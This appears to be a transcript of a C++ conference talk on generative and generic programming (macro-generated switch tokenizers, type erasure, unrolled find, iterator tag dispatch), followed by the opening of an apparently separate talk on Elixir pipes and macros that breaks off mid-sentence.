The first thing I write is the infinite loop, and then I organize myself inside of it. And the second thing is, switch is the most efficient way to take multiple decisions, because compilers have gotten amazingly sophisticated at optimizing switch statements. They analyze the table, you know, what's going on, the cases, and they generate stuff that you don't even recognize in assembler, how it looks compared to the initial switch statement, which was very tame and ordered. They generate code that's completely bizarre. Okay. So don't forget, if you want fast: infinite loop, switch. That's it. So, well, the infinite loop is outside this guy, so you don't see it, but it's there. All right. So, well, we're going to switch on the value of the next character in a C++ source file. We want to tokenize this guy. So then we define apply a different way. We say, well, apply of C0, T0 is going to expand to case C0. And I put some parens here just to make sure there's no weirdness in expansion. And same thing here. It's just good style; generally, nothing bad is going to come out of it. So: case C0, T, which would be my current token, gets T0, and token length is one, because we know it's a one-character token. And then I'm going to go to insert token. I should underline: not all fast programs contain goto. Okay. But it's allowed as long as it's inside the macro. If you generate goto with a macro, that's fine. If you write it by hand, it's not as fine. And again, I'm only half joking. Except in destructors. Except in destructors. Yeah, in destructors you're allowed, because those must be very fast. Okay. So this is an internal joke for those of you who've been at the workshop. So we have this macro, which is going to expand to case, assignment, length, and goto. And then we're going to expand this guy. Boom. All right.
Let's analyze what the expansion looks like. Well, getting back to this guy: it's going to say case this character, token gets TK tilde, token length gets one, goto. Right? So very nice. I generate a bunch of case labels here, a lot of cases, with this one macro expansion. And then I'm going to say #undef apply, and I'm going to continue with what? With the two-character tokens. And at the end of the day, what I'm going to have is again a very compact notation that is going to, during compilation, expand into a humongous quantity of labels and code and stuff that's going to be very regular and very fast in nature. Okay. This is the macro for two, which is a bit more complicated, and it has a little decision tree here, because we're looking at two tokens. So, let's see. C1, T1, C2, T2. Character one, character two, token one, token two. Case: first character is C1. I should have had parentheses here just to be nice. If the next character, the lookahead, happens to be C2, then I know it's a two-character token, so I'm going to do T gets T2, right, and the token length is two. And otherwise, it's a one-character token, because my lookahead failed. So I know it's going to be a one-character token, so I'm done here with T1 and token length one. And then goto insert token, and again I'm expanding all of these guys. So if you look at the generated code after this preprocessing, it's going to be a lot of these token-expansion mini-snippets hidden inside a switch statement, which is hidden inside the infinite loop. And this is going to run like a bat out of hell, fast, okay? Questions so far? So, higher-order macros, right? Makes sense? All right. Well, but templates are the cool way to do C++ generative stuff. And actually there's a subtlety to it, because many people say, oh, I'm using templates, I mean, what's the deal with generic, generative, templates, macros, code generation, all that stuff.
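The one-or-two-character lookahead cases can be sketched as follows. Token names and the macro name are illustrative, not the linter's real ones; the shape matches the talk: test the lookahead character, fall back to the one-character token, and jump to a common insertion point:

```cpp
#include <cassert>

enum Token { TK_EOF, TK_COLON, TK_COLON_COLON, TK_LESS, TK_LESS_EQUAL };

// One macro expansion per leading character: a little decision tree that
// prefers the two-character token and falls back to the one-character one.
#define ONE_OR_TWO(c1, t1, c2, t2)                     \
    case c1:                                           \
        if (pc[1] == c2) { t = t2; tokenLen = 2; }     \
        else             { t = t1; tokenLen = 1; }     \
        goto insertToken;

Token nextToken(const char* pc, int& tokenLen) {
    Token t = TK_EOF;
    switch (pc[0]) {                 // the switch (the infinite loop would wrap this)
        ONE_OR_TWO(':', TK_COLON, ':', TK_COLON_COLON)
        ONE_OR_TWO('<', TK_LESS, '=', TK_LESS_EQUAL)
        default: tokenLen = 0; return TK_EOF;
    }
insertToken:                          // the common "insert token" target
    return t;
}
#undef ONE_OR_TWO
```

Each `ONE_OR_TWO` line expands into a full case label with its lookahead test and `goto`, which is exactly the regular, fast generated code the talk describes.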
I mean, there's kind of a confusion of terminology here. Well, in a way, C++ templates are inherently generative, because they use so-called heterogeneous translation. So let me explain this a bit. In programming language theory, there are two ways to translate generics into regular non-generic code. One is called homogeneous translation. Let me explain that first. In homogeneous translation, all instances of the generic construct are going to share the same binary code, the same generated code. Which languages use it? Java? Java would use homogeneous translation, right? Because in Java, no matter how you use generics and such, they're going to be reduced, essentially type-erased, into the same byte code and ultimately binary code, right? So there's this homogeneous process in which generics are essentially just a syntactic trick over the same code. And what's the advantage of using homogeneous translation? There's got to be advantages, pluses and minuses for everything, right? Code is going to be more compact, smaller. Backward compatibility with non-generic code, in the JVM in this case, indeed. What else do we have? Yes? Possibly simpler implementation. Possibly, yeah. I can think of things simplifying and complicating matters for both approaches. But, you know, especially if you already have a huge engine that's doing things that way. What else? There's got to be some disadvantages too, right? Otherwise everybody would do it. Yes? Type? Type? Type safety. Type safety. Since Java introduced generics, it turns out that you can write Java programs that don't have casts, but they fail with type errors at runtime. So, you know, eventually it's a sort of unsoundness in Java, because it has these homogeneous generics.
And actually there was a ruckus a while ago, years ago, about Java, because people thought Java is type safe. And there's a ten-liner example that a researcher gave, and it showed that there's a program that has a type error during runtime even though there are no casts inside and there's no fault during compilation. Yes? Come again? Ah, so the generated code is going to be slower, because it needs to obey the same binary interface regardless of the types involved. And the typical example is using things like lambdas. For example, if you want to sort integers or sort strings or sort doubles, and you call sort with a comparison lambda, the binary code of sort will have to be identical for all cases. And because of that, it's going to use an indirect call for the comparison primitive, because it can't change it. So it's going to have some sort of binary indirection, an extra level of indirection, for the call to the comparison function. And since the cost of sort as a whole is essentially multiplied by the cost of the comparison function, it follows that sort is going to be inevitably slower than one written by hand, which would be specialized. In contrast, if you go to heterogeneous translation, which is pretty much like macros, we all know that in C++, if you sort things, if you sort integers or sort doubles or sort strings, there are going to be three completely different sort functions. And each is going to essentially wire inside, in the same way we did with the macros, the comparison that says array at position i is less than array at position j, or whatever, right? How large do you think this performance gap is? I see a big, you know, this opera voice by Hubert. Well, what, I mean, how big? It could be an order of magnitude. So we're looking at something serious.
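The two call structures exist side by side in C++ itself, which makes the contrast easy to show. `std::qsort` takes its comparison through a function pointer (one binary for all element types, like homogeneous generics), while `std::sort` is a fresh instantiation per element type and comparator, free to inline the comparison. Results are identical; only the call structure (and, in the speaker's point, the speed) differs:

```cpp
#include <algorithm>
#include <cassert>
#include <cstdlib>
#include <vector>

// Homogeneous style: comparison goes through an indirect call.
int cmpInt(const void* a, const void* b) {
    const int x = *static_cast<const int*>(a);
    const int y = *static_cast<const int*>(b);
    return (x > y) - (x < y);
}
std::vector<int> viaQsort(std::vector<int> v) {
    std::qsort(v.data(), v.size(), sizeof(int), cmpInt);
    return v;
}

// Heterogeneous style: the comparator is part of the instantiation and
// can be inlined right into the sorting loop.
std::vector<int> viaSort(std::vector<int> v) {
    std::sort(v.begin(), v.end(), [](int a, int b) { return a < b; });
    return v;
}
```

The magnitude of the speed difference depends on the element type and the compiler, but the structural point stands: `viaQsort` pays an indirect call per comparison, and the comparison cost multiplies the cost of the whole sort.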
And of course, people understand that, and they work to fix it. And the main problem with this performance gap is that it leaves an incentive for people to define their own routines. It works against modularization, because with modularization you'd have sort in the library and never care about anything else; but it turns out that people who want to do high-performance Java are going to end up redoing some of these things over and over again. Oh, I'm on battery. So give me just a second here to, okay, system preferences. I've got to disable the screensaver, otherwise it's going to drive everybody nuts. Never. It says, you know, it's going to shorten your life. I mean, sorry, not my life, the monitor's life. Again, please, thank you. All right. So, homogeneous and heterogeneous. And C# takes a third approach, which is somewhere in between, called reified generics: it's homogeneous, but at the same time they put enough information in the generated code to restore full type information. To give you an example, let's say we have a, before that, before that. So to some extent, templates are automatically generative. However, people tend to not think in those terms, because they say, well, if I'm to make all of my code a template, then what's the gain in generative, et cetera. So I'm going to give an example that's going to use something called type erasure to realize generative code starting from generics. Who knows what type erasure is? Type erasure. Okay. Great. So let's say we have an SQL engine, which is taken from production code, in fact. And we want to define things like the sum aggregation function. And we want to be able to define it for long and essentially all integers, and sum for double and all floating-point types, like float and double, and then, you know, short, int, long, whatever. We want to define the sum aggregator, which, you know, sums things.
And the baseline approach, which was actually in the Java program, was to use an indirect call for adding each element, essentially one virtual call per element added, which was prohibitively expensive. So then let's make it faster. The Java approach would be to define completely separate code that looks very similar for summing doubles and summing integers, and then you restore the speed. But we want to do better. From the same code, we want to generate several instances of this summing, right? Write a template to generate them both. And we start simple. Apologies for the template keyword here; it's spurious, a copy-and-paste artifact. So we have an aggregate result, which is going to give me the result of the sum. And this is sort of my base class. It's not templated, as I said. And it gives things like, you know, map this variant to the result, and finally, ultimately, get the result. Now, a word about variant. I discussed this a bit in my workshop. But let's recall what a variant is. Variant. Somebody who didn't answer yet. What is a variant? Okay. So I'm going to explain briefly what a variant is. Recall that in a database, a column, a field of a database, can't be just any type. It can't have arbitrary types, right? It can be an integer. It could be a floating-point number, a string. And, you know, databases are finicky about strings, because I want a string up to this many characters. So it's a fixed-length string, or it's a variable-length string, or a blob, kind of a binary object of undetermined substance. What else can we have in a database? A date, a date-and-time, a time, right? What else? Boolean, I guess. What else? Blob. Yeah, blob, an untyped large binary object. What else? Decimal. A decimal, BCD, whatever, yeah. Stuff like that.
So a lot of stuff can live in a database, but it's part of a finite and closed universe. This is my point. So, depending on the database, it's going to be part of a closed universe of types. It can be extensible. I can say, oh, let me define my own stuff to put in a database. It's still going to be a closed universe. To represent elements of a closed universe, your best approach is to use a so-called sum type. Who's been in the workshop? Okay, I recognize you already. So we discussed sum types a bit, and essentially a sum type, also known as a variant, is a type that can hold at any point in time one of a closed set of types, right? And this works great with databases. What is the advantage of a variant over a class hierarchy? Because I could define a class hierarchy: I'm going to have a root called, whatever, field, and then derive integer field, double field, string field, blob field, date field. What are the relative advantages and disadvantages of variant compared to a class hierarchy? Yes? You can pass it as a value. So you get rid of the whole indirection business, terrific. That's a great point. I would need to use reference semantics for the hierarchy, and actually in Java you need to do it that way. And there's one extra indirection in the mix for a very low-level kind of thing that you need to be fast. What other trade-offs are there? There's one that's subtle, which is correctness. In a class hierarchy, if you get a base class, it can be pretty much anything; the universe is open. So you don't model the reality really well. But in a closed universe with variant, you know exactly that it can only have a finite set of possible types. So it's much easier for you to preserve the correctness of your program, since you know during compilation that there's no other type in the set.
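The closed-universe point can be shown in miniature with `std::variant` (the talk's production code uses `boost::variant`; the column types here are a toy subset, and `Field`/`describe` are illustrative names). Value semantics, no indirection, and the compiler knows the set is closed: a visitor that misses an alternative fails to compile, which is the correctness advantage over an open class hierarchy:

```cpp
#include <cassert>
#include <string>
#include <variant>

struct Null {};   // the database NULL, distinct from any real value
using Field = std::variant<Null, long, double, std::string>;

// Exhaustive visitation over the closed set of column types.
std::string describe(const Field& f) {
    struct Visitor {
        std::string operator()(Null) const               { return "null"; }
        std::string operator()(long) const               { return "integer"; }
        std::string operator()(double) const             { return "double"; }
        std::string operator()(const std::string&) const { return "string"; }
    };
    return std::visit(Visitor{}, f);
}
```

A `Field` is passed by value like any other object; and because `Null` is the first alternative, a default-constructed `Field` is the database NULL.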
You can't add new types to the set. All right, so getting back to this example, we have an aggregate result that knows how to map the current row into the result. This is the worker, this is how I do work, and this is how I get the result of the work. Now here's the interesting part. I'm going to template SumAggregateResult, which inherits AggregateResult, and to map things into it, I'm going to take the variant that comes in as input. Oh, sorry, sorry. For everything in the database, there's one particular variant state that's always possible, which is null, right? Database null, which is a bit different from the null pointer in programming languages; anything can be null in a database, et cetera. This is why this test is here. So I'm taking the current row, and if it's empty, which is Boost's terminology for "the variant has no meaningful value inside of it", I skip it. And otherwise, I'm going to say boost::get of T from the variant, where the variant is a boost::variant type with all the appropriate types instantiated, and it's going to add that value to the sum. And plus-equal is going to check that the type is appropriate and is going to add to the current result, right? All right. And get is going to simply return me the, oh, sorry, it's not void, it's a variant. It's going to return me the result. Okay. So what are the pluses and minuses of the design? Well, I'm seeing a virtual call here. So for each thing I'm adding, I'm going to pay a virtual call, but that's in a way inevitable, because with a database you don't know statically what type the field has, for example. So this is a kind of necessary evil we have to put up with. And the advantage is, well, the sum is going to be of a native type, an int or a double or whatnot.
And then when I add to this, it's going to be a very cheap operation, because all it does is one test and one addition. So I'm not paying a virtual call for the addition itself. So that's an advantage. And here comes the type erasure part, which goes as follows. I'm not going to describe in detail what register does, but it's kind of visible from the arguments. So I have a register operator call. This is not my fault, you should know. Okay, thank you. It was there. I could have shown you and you would have gathered it. So when I register operators, what I'm doing is planting some sort of callbacks that are going to be used later by my SQL engine, in this case for summing things. So I'm registering an operator with the name of sum, because that's what it is called in SQL, right? And later the database engine is going to look me up whenever it sees sum. It's going to look up this word sum in the registry and it's going to pick up my function. And what types do I care about? I care about the type list containing short and long, because these are the guys that I can support with my addition on long. I'm going to treat everything as long, right? If I were in the mood, I could have said, well, for int I want to use 32-bit addition and for short I want to use 16-bit addition. It turns out that 64-bit addition, as we discussed in the efficiency talk, is simply good enough; it's fast, it's one cycle. So you don't care. Everything that's convertible to long is good. And here we have a lambda that knows how to create an object of this kind, because when the engine does its thing, it's going to look sum up in the registry, it's going to create, using the lambda, an object of the appropriate type, and then it's going to use map and get with it. So it's going to call into my functions.
And second, I'm going to register a second guy, which is going to define an operator with the same name but with the type list of float and double, and that is going to work with doubles. And here I have the appropriate lambda that knows how to instantiate the SumAggregateResult. And at this point I'm able to interface this generic code that we wrote with the template with code that has no idea of templates, that is completely interpreted and comes from the SQL engine, because SQL is an interpreted language. I mean, you can in theory, but nobody compiles SQL the way C++ is compiled, for example. And last but not least, at top level I'm going to say, well, let me register these during program startup, and I'm done. By the way, this is an interesting use of the comma expression, right? I have a void function here that returns nothing. And static const bool registered equals register ops, comma, true, which means it does nothing except call that function and then vacuously initialize registered with true. So far so good. All right. What's the type list business here? People who have been in the workshop know, but essentially a type list is a very simple way to represent collections of types as a singly linked list of types containing head and tail. It's a very old technique that has nicely gotten a revival with the advent of C++11, because in C++11 we have variadic templates, which make a lot of matters related to these variable-length kinds of structures a lot easier and nicer and simpler to deal with, right? Okay. Well, the key point here is that achieving generative code with C++ is subtle, in the sense that simple generics, templates, do not achieve it to the maximum; you've got to have the whole type erasure business so it can interface properly.
And you generate types with generics, and then you erase them with type erasure, such that the code expands, but at the same time it stays compact whenever you interface with code that doesn't do generics. So far so good? Yes? Sorry, could you point out a bit more clearly where exactly the type erasure happens? Oh yeah, exactly. So where does the type erasure happen? Okay. It happens in the fact that register operator, this guy here, these guys here, are going to deal not in terms of SumAggregateResult of int64_t and SumAggregateResult of double, but instead they're going to operate in terms of AggregateResult, which, I hate my copy-paste error, I hate this template. It's a Freudian slip here, right? This should not be here. So they're all past the templates; they all operate with exclusively non-template code and virtual functions. Yes? Type list? Type list? We haven't open-sourced that yet, but I mean, it's really simple. Boost has a number of MPL facilities that represent collections of types, and there you can use MPL vector, and there's also MPL list, and I think there's a map as well, but that's not relevant to this case. Essentially it's a very simple piece of code, whether you do it from scratch or use Boost. All right, questions about this part? All right. So, you know, let's talk a bit about generic programming, which is different from generative programming, although we did see that, in a somewhat confusing way, it interleaves with it. So let's talk about generic programming, and again I'm going to ask for your participation: what is generic programming? Because again, it's like, oh, I'm doing templates, I'm doing generic programming and I'm so happy, but it's not as obvious as it may seem. So what is generic programming? All right, I swear I'm going to run after Jacob and I'm going to say, Jacob, you know, these people don't want to answer my questions. Why don't you answer?
Okay, oh, here's, I'm kidding. Primarily in terms of algorithms, as opposed to in terms of the types. Yeah, more, add to this. Structure-based programming is generic programming, is that it? Yeah, you're factoring out commonalities of structure. You're factoring out commonalities of structure. Well, here's how I define it, and I think this is how Stepanov defined it, and some people may disagree with the definition, but let's put it this way: Stepanov invented it. So he has the first crack at telling what it is, right? He invented the term, he put it together, so it's his prerogative to say, well, here's what I think it means. So it's the endeavor of finding the most abstract expression of sound computation, aka an algorithm or whatever, without losing its essence or efficiency. And this whole efficiency thing is a bit vague, because where does it stop? Do you want to stop at assembler? But essentially we're talking about things like this: we want to minimize anyone's incentive to go back and re-implement the same computation from scratch, right? Because as long as you leave a gap there, there's going to be friction against modularity and against reuse. But if you do implement binary search or linear search or sorting or whatever, and you implement them to maximum efficiency, within 5% or whatever, within a few percent of the best handwritten code, then you won. If you're within 30% or worse, maybe everybody is going to be like, oh, I know I could use these fancy routines, but actually, if I really mean business, I'm going to go ahead and implement my own. And that's the anti-reuse, right? That would be just the baseline. And a lot of very interesting languages actually fail at this kind of stuff, because they do offer very nice routines, but there's actual trouble implementing the language's primitives efficiently within the language itself.
So higher-order functions and all that good stuff. And in Lisp, for example, a lot of people use macros, because with macros you have complete control over what gets generated. They use macros as the equivalent of higher-order functions, even though higher-order functions would be the party line and the officially recommended way to do things, because, they say, those are slow. If you have an indirection in there, you're kind of dead in the water. So then, let me use some macros to generate code, and then I'm going to run it with no indirection, right? So this is generic programming. Boom. So we don't want to lose either the essence of the algorithm or the efficiency of the algorithm. What do I mean by essence? Again, this is a vague definition; it's not a formalism of any kind. So what do I mean by the essence of the algorithm? Well, yes? I would say it would mean keeping the syntactic shape the same. So, yeah, you want to keep the syntactic shape of the algorithm in its archetypal form. Some details about the essence would be things like this: in binary search, you kind of have to have random access. If you have a binary search in which you move linearly, it's not a binary search anymore. If you have a quicksort that copies data, it's not a quicksort anymore, unlike what some people may tell you, because if you do functional quicksort, it's going to copy a lot of data. It's not quicksort by definition. It's at best a poor implementation of an algorithm that derives from quicksort, and it's going to be very slow. But my point here is, it's got to look like what the algorithm looks like in the textbook, right? Because quicksort is, you know, in-place partition and recursion and those good things.
And the incarnation of the algorithm must have in-place partition and, you know, recursion and things, right? Great. So, symptoms of generic deficits: same drama, different stage. You find yourself in a situation pretty much like in generative programming. You implement the same algorithm several times. True story: a friend of mine had to work with a code base which was very slow, and they said, you know, optimize it. So he found five different implementations of sorting, and all were bubble sort. Okay. So probably the one algorithm that needs to be completely eliminated from the consciousness of all programmers in the world is bubble sort, because it's almost rigorously worse than anything else you can try. And yet people do it all the time. And of course, you replace all those five with one call to quicksort, in that case it was for C, but, you know, with a call to a template sort, and you're done, and it's faster and more reusable and better. By the way, you know qsort in C, the routine? Yes. How does it compare to sort in C++? In speed? It's slower. How much slower do you think it is? Well, the comparison is going to be an indirect call. So I've seen things like 3x, right? I've seen things like 3x, measured by people who in a way ought to know better, because they thought C is efficiency and C++ is fluff, kind of, you know, all these templates and stuff. And actually, all those indirect calls can really haunt you. So you have a generic programming deficit when you design with high-level notions, but when you get to the implementation, you get down to the greasy, you know, nuts and bolts, and you get your hands dirty, and it looks nothing like what you thought about. And it's like, oh, there's this nice design that we had, and it's in a document that's, of course, out of date by three years.
But this is our design document, and the implementation is nothing like the design. You can never reuse a function without changing just a few details. So this is another issue with a non-generic approach to programming: we have a lot of similar methods in hierarchies that you cannot reuse. All right. Anybody had these symptoms in their lifetime? Nobody. Okay. We can go home. There's a dinner cruise, whatever. There's nothing else to do. Why is C++ good at generic programming? Well, it has four key things about it. One is the template engine abstracts at low cost or no cost at all. And when I say no cost, I mean things that completely vanish during inlining. So after inlining, things become a constant or things like that. We've seen a lot of examples like that. Post hoc specialization is possible. So you have an algorithm that's implemented in a very generic way, but then you come later and specialize it for a specific context and case. And that's possible in C++ by means of template specialization and partial specialization. It has great efficiency to begin with, because it's from the C family and all. And it doesn't commit to one paradigm. So it lets you easily shift from one approach to another when you do things. And that makes it possible for you to combine generic programming techniques with other techniques and also to, essentially, choose the best tool for the job in any situation. Of course, it also requires a lot of learning and virtuosity to get to that level, but the important thing is it does allow all of these. As a simple example: find an item in an array and work with it. No problem at all. We know how to do that. It's a classic algorithm. The alternative would be a handwritten loop, but I want to write it that way. So I'm going to find, from beginning to end, this element. And if it hasn't hit the end of the range...
It means I found it, and I'm going to do work with *i. It only works with certain topologies. It doesn't work with a tree; it works with a linear structure. And, well, the handwritten loop mixes searching with work, and it's difficult to improve modularly. So, let's see how doing things with find would allow us to make find a lot faster for certain categories of iterators. So, what ideas do you have for a better linear search, the better mousetrap? Well, one idea would be to make it unrolled. So we say, well, for a specific kind of iterator, which I'm going to call a random access iterator, and a specific type of value, I'm going to define find for this kind of iterator: begin, end, value. And I'm going to do a classic unrolling, which goes like this. I'm going to start with a prefix loop, which runs as long as e minus b is not divisible by 4. In there, in a classic manner, I do a linear search one step at a time. And here, e minus b is divisible by 4; it's a multiple of 4, right, at the beginning of the main loop. So then I'm going to do four steps at a time. I'm going to go: if b[0] equals v, return b; if b[1] equals v, return b plus 1, and so on, four times. And then I'm going to go back and repeat that again. So now the thing is, how much faster do you think this is for your typical things like integers and strings and floating point numbers? Give me a number. So you think it's 10 percent faster? 2x faster, who gives more? So actually, yes? One order of magnitude. Well, here's the thing: it can't be more than four times faster. This is the nice thing, it has an upper bound, right? It can't be more than four times faster, because what we're saving here are things like incrementing this guy and testing against the end, and we're saving four times as much of that. So: this is 3.8 times faster on integers and doubles, it turns out. If you use binary search, it's another order of magnitude.
Yeah, it could be any number of orders of magnitude, depending on the size searched. Yes. But the nice thing is, there are two important details about this. He's catching a plane, you should know. He's not bored, okay? See you. Bye. Good to meet you. All right, so there are two aspects to this that are relevant. Number one, it's a lot faster, and four times does matter: making linear search four times faster, and linear search is used everywhere, by everybody. Even people who should know better use linear search; in a lot of places they should use better structures for searching, but a lot of people just use linear search because it's the easiest way and it works on unstructured data. So number one, it's a lot more efficient. And number two, you don't want to write this every time. You don't want to sit down and write this whenever you do some searching. You don't want to sit down like an idiot and write the same code four times over, right? It's not something you should have any incentive to sit down and write over and over again. So even though find maybe doesn't look as nice as a loop to you, there are people who say, oh, I have a for, and if I found it, I'm going to do stuff, and it's all inline code, and why do I have to call a function to find something in a container? Why do I need to go through all these indirections, conceptually at least? And the answer is, when you come to this, you realize that it's actually nice to take advantage of what other people have done, without you making any extra effort. You just call find and you call it a day. And the classic idiom to implement find in this particular way for random access iterators is the iterator tagging technique, which is worth knowing; I think this is the one generic programming idiom that needs to be mastered by every C++ programmer.
It's the hello world of generic programming, the whole tagging business. And the way this works goes like this. Well, I'm going to write find, and the first thing I'm going to do is add an extra argument to it, which is a std::input_iterator_tag. This is a type that's defined in the standard library, but you can define your own, no problem. Essentially it's a type that guides my find function a specific way. And in this case, as you notice, I'm just doing a linear find, a linear search, a straight loop with no tricks, right? And this works for any iterators, including the input iterators, which are sort of the dumbest iterators you can find: they can move forward, you can't move backward, and you can't save your position and stuff like that. So these are the least capable iterators, and find is about the only interesting thing you can ever do with them, right? Oh, we're kind of nearing the end. All right, well, for binary search, sorry, for random access iterators, we're going to pass this find a std::random_access_iterator_tag in the same position, and we're going to do the trickery, right? And, well, you don't want the user to sit down and pass you the appropriate tag. So what you need to do to wrap this up is to say, well, I'm going to define find, sort of the user-visible find, the non-private find. You can think of these other two guys as private, okay? You can think of these two guys as private, right? Sort of hidden functions. And this guy is going to take the iterators, begin and end, and the value, and is going to pass iterator_traits' iterator_category. And this part is a bit of type introspection, which C++98 has a little of, C++11 has a little more of, and C++14 has a lot more of, which is pretty awesome, because it allows you to introspect properties of types during compilation.
And it's going to use this little bit of introspection. Don't mind the typename; I hate that, but you need to type it to please the compiler, otherwise it thinks it's a value and stuff like that. So what I want to do is access, inside iterator_traits, its category, instantiate it as an empty object, and pass it to the other find overloads. And the way that works is this: iterator_category for any random access iterator is going to give me random_access_iterator_tag, and for anything else it's going to give me some other type, which is going to be a subtype of input_iterator_tag. And if I get a random access iterator from the introspection bit, this is going to be a perfect match, boom. Otherwise it's going to be, well, how many iterator categories do we have in C++? We have random access, the most powerful; then we have bidirectional, which is somewhat less powerful; then forward and input, right? So for random access we have a perfect match, boom, it's done. The other three are all going to convert automatically to input_iterator_tag, because they inherit from it. It's a subtyping thing. So everything that's not random access is going to go to this guy and is going to be picked up by this implementation, and we're going to have a straight linear search for them. You'd be surprised to find out how many people actually spend time on improving this kind of stuff. If you look for things in a const char*, they're going to use memchr, right? If you're looking for characters in an array of characters, they're going to use memchr, because there's nothing faster in the world than memchr, right? If you look for things in, again, contiguous memory, things that are not characters, there's again a variety of techniques that make for fast finding. If you're looking in an array of mutable objects, there's the sentinel technique.
You put the item you're searching for at the very end, so then you don't need to test for any boundaries. You just go at blazing speed through the whole thing, and so on and so forth. And all of this is made possible, by means of generic programming, for people who couldn't care less about how the whole damn thing is implemented. They just want to find things in places, right? All right. And testing it, one, two, three: we have a vector, we have a list. The first find is going to search the vector; it's going to use the fast find. And the second is going to use the bidirectional iterator find, which falls back to the simple find implementation. All right. Ready for the evening. Thanks for being here, and I'll take any questions offline, because I'm sure everybody wants to go home, hotel, whatever. Thanks very much. D, your favorite color is green, okay? Go for green. Actually, you wrote two things. Oh, yeah.
Generative and generic programming are two rather different notions under similar names. To make matters more complicated, they actually do share a few interesting characteristics. This talk introduces generic and generative programming using various mechanisms offered by C++.
10.5446/50583 (DOI)
Okay, you're in the right place. This is a talk on a new language called Elixir. And mainly what I want to talk about is not necessarily just the Elixir language, but the idea of combining a couple of concepts. Elixir is a new language that's based on the Erlang virtual machine, so you have all of the machinery that comes with it. And some of the things that Erlang does well are especially distributed programming and concurrent programming. There's an actor model baked in. But there's also the concept of distributed programming, and when something fails, the error propagation is very good. In fact, it's probably the best system out there for the reliability of soft real-time systems in a general-purpose functional language. So Elixir has the Erlang virtual machine. It also has a rich syntax. I don't know if any of you have ever programmed in Ruby. Many people at conferences, especially like this one, like Ruby syntax, but don't like a lot of the things that come with Ruby in terms of reliability and performance. Elixir does base a lot of its syntax model on Ruby, which is very readable, and it's easy to plug in domain-specific languages. But that's where the similarity ends; it's just a rich syntax. The third element that I want to talk about, though, is the idea that every programming language and every programming paradigm is going to fall short of modeling the real world. It's just the nature of things. And one of the things that a good language needs in order to stand the test of time is the ability to step outside of the programming paradigm and actually code more of a domain-specific language, or more of the real world, directly into the model. So a good language is not just about what it does well; it also allows users to break the rules of the language syntax to do things that the language didn't foresee.
So in this particular talk, we're going to talk about macros in a rich syntax with an abstract syntax tree, but we're going to talk about them in the context of pipes. So the creator of the Elixir language is José Valim. And I was sitting with José and Dave Thomas, who are two big Elixir guys, at a conference. And I asked José, why did you include the pipe concept in the language? And he basically said, I stole them from F#, and then just kind of stared at me like, that's all you need to know. So I said, okay, I'll back up and I'll try again. You know, I'm very persistent, very patient. I said, well, I'm writing a talk, José, so give me something. And I said, do you see them as an important part of the language? And he says, it's puzzling, I haven't given much thought to it. And I thought, this isn't going to get me very far. And then Dave Thomas came to my rescue, and he said something like, well, that's not what you said when I created the title of my book, which has actual pipe constructs in the subtitle. And so José elaborated a little bit, and he said that this was an important tool for helping us think about the way that programs are composed. And most of my talks this year and last year are about moving the industry's heads from the object-oriented paradigm to the functional paradigm. And I think that when you do that, it helps to be able to talk about not just the individual constructs, which are functions, but the ways that we can think about composing them together, so that we can actually build programs that read more like stories. So as José elaborated a little more, he said it embodies one of the main ideas of functional programming, which is the transformation of data. So if I have multiple steps, I can take data, pipe it through a function, pipe that result through another function, and continue on. And I thought that that was actually a pretty good insight.
Actually, so, I'm an author; I wrote a book called Seven Languages in Seven Weeks. My publisher is also an author. He wrote a lot of the Ruby books, including the pickaxe book that you see. And he and I often get restless at the same time. So we'll look out at the industry, we'll look at our code examples, and we'll notice some deficiencies. And I don't know if any of you have written books, but a lot of it is based on fear. When you feel something that is not quite right, and you want to communicate it to your reader base, you drop into research mode and you start looking at the landscape. And Dave and I were looking at the landscape at the same time. And I didn't know this, but I said, hey, I've discovered something really cool with this Elixir language. It's not popular yet, but it looks like they're doing the right things, and they're about to be. And then, as I was looking at the mailing list, I kept seeing Dave's name pop up, and I said, oh, he beat me again. He was writing this book; he basically disappeared from the map for a couple of months, and when he surfaced again, he'd written a book on the Elixir language. And the last one he wrote basically helped the United States, along with David Heinemeier Hansson, who wrote Ruby on Rails, discover the Ruby programming language. And baked into the subtitle of the Elixir book are these pipe characters. So the subtitle is Functional |> Concurrent |> Pragmatic |> Fun, right? And so I asked Dave why he included the pipe character in his book, and he said, well, it's an essential element of data transformation, which is the new type of program composition. And I really like that answer. There's a guy named Chris McCord who created a framework called Phoenix, which is supposed to be a Rails-like framework on Elixir. And he said, pipes and macros are why I'm here. So it was nothing about the Ruby-style syntax; it was everything about the virtual machine and pipes and macros. And I agree with him.
That's what was exciting to me. I talked to the creator of Erlang, Joe Armstrong, at EUC, the Erlang User Conference, last year. Anybody seen his talk, by the way, about the mess we've made? Was it good? He's got some fantastic insights. So Joe wrote a blog post that was called A Week with Elixir, or something like that. He said, actually, the Elixir version is easier to read than the Erlang version: so I do a format, and then flatten it, and then turn that list into a binary, with the pipe operator. And he said, just like the good old Unix pipe operator. So I agree with him. So here's the fundamental problem that we're solving. If you're looking at a basic functional program, with the calls nested inside out, it's, well, I guess we have an idiom in Texas, the Texas two-step, it kind of comes from the dance, but it's one step forward and two steps back. This is what such a program would look like in a lot of functional languages, and it reverses our intention, which makes us sad. What we'd like to be able to do is take this and flip it around, to make it read left to right, like this. And if you did that, you could show the same program like this: the first thing is a piece of data, and each subsequent thing is a function, and the piped value becomes either the first or the last argument, depending on whether you're working in F#, or Haskell, or Elm, or some other language. In Elixir, it's the first argument. The first argument will actually be received from the construct on the left. And that's cool, because that's exactly the intention that we want to express. So when you can break down programs this way, you find that some of the programs that we've been writing all along, especially web programs, become a lot easier to think about. In Elixir we have this thing called Plug, which is a framework that describes an HTTP connection.
So if you can imagine an HTTP connection as something that embodies the data associated with the connection and the data that you'd like to tack on as it goes through the life cycle of a web program, then you've got something called a plug. And if you basically pass that connection into a function and transform it in some way and return a plug, then you can express most web programs with a functional paradigm quite easily. Then instead of having one great massive integrated framework, you can have many smaller published plugs. That's pretty cool. Okay, so that's why we'd like to do pipes. Let's talk about some of the problems related to the pipe operator in its most generic sense, and how having the ability to hack the language using macros could change things quite a bit. Okay, so the first problem is that I might have some unreliable tasks. And if I try to pipe all of those together and they break, then I don't get a reliable return code. So let's say that I'm coding an unreliable game like Russian roulette. So in Texas we have a six-shooter, and you put one bullet in the chamber, spin it, and then hold the gun to someone else's head — we're in Texas, right? — and then pull the trigger. Well, if I run this simulation, you see the line at the bottom. So I start with an :ok return code, meaning I'm ready to start the game. And then I pass that through my click and my bang methods. And one of those should end the game, and the rest of them should just say click, right? But I get this result. It's kind of surprising, right? Because I have a click after the bang. So we're surprised and ultimately angry and sad, because our code 